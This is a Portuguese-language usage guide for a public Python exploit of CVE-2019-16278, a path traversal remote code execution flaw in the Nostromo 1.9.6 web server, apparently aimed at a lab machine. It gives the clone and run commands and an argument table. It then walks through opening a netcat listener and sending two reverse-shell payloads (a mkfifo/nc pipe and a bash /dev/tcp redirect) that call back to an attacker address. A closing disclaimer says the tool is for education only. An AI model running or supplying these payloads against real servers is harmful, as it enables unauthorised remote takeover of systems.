
Um atacante não autenticado pode forçar pontos do servidor para um arquivo shell como '/bin/sh' e executar comandos arbitrários devido à falha na verificação da URL que leva a path traversal para qualquer arquivo que exista no sistema. Versões do Nostromo como 1.9.6 falham em verificar esta URL
POC
Repositório: https://github.com/CybermonkX/CVE-2019-16278_Nostromo-1.9.6---Remote-Code-Execution.git
Este repositório contém um exploit em Python para CVE-2019-16278, uma vulnerabilidade no Nostromo 1.9.6 (um servidor web). A vulnerabilidade permite Execução Remota de Código (RCE) ao explorar um traversal de diretório para executar comandos arbitrários no sistema alvo.
git clone https://github.com/CybermonkX/CVE-2019-16278_Nostromo-1.9.6---Remote-Code-Execution.git
cd CVE-2019-16278_Nostromo-1.9.6---Remote-Code-Execution
python3 CVE-2019-16278.py -t <TARGET_IP> -p <PORT> -c "<COMMAND>" [-b <BYTES_TO_READ>]
Argumentos:
| Argumento | Descrição | Obrigatório | Padrão |
|---|---|---|---|
| -t, --target | O endereço IP do alvo | Sim | Nenhum |
| -p, --port | A porta do alvo | Sim | Nenhum |
| -c, --command | O comando a executar no servidor | Sim | Nenhum |
| -b, --bytes | Número de bytes a ler na resposta | Não | 4096 |
python3 CVE-2019-16278.py -t 10.10.10.165 -p 80 -c "whoami"
Passo 1: Inicie um listener Netcat na sua máquina atacante:
nc -lvnp 443
Passo 2: Execute o exploit com um payload de reverse shell:
python3 CVE-2019-16278.py -t 10.10.10.165 -p 80 -c "rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2>&1 | nc 10.10.16.5 443 > /tmp/f"
python3 CVE-2019-16278.py -t 10.10.10.165 -p 80 -c "bash -i >& /dev/tcp/10.10.16.5/443 0>&1"
Esta ferramenta é destinada apenas para fins educacionais. Não a utilize em sistemas que você não possui ou sem permissão explícita para testar. O acesso não autorizado a sistemas é ilegal. Use com responsabilidade.